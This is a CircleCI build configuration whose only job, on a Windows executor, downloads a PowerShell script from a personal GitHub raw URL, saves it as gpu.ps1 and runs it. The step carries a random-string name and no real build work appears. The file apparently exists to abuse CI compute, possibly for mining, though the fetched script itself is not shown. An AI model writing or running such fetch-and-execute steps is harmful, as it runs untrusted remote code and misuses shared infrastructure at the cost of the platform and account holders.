version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 22Vr24utB9L4Y2gVKRZiROAYL43_2C81Rox4gnWUg6pn977PW
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/Yahihs/rep/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1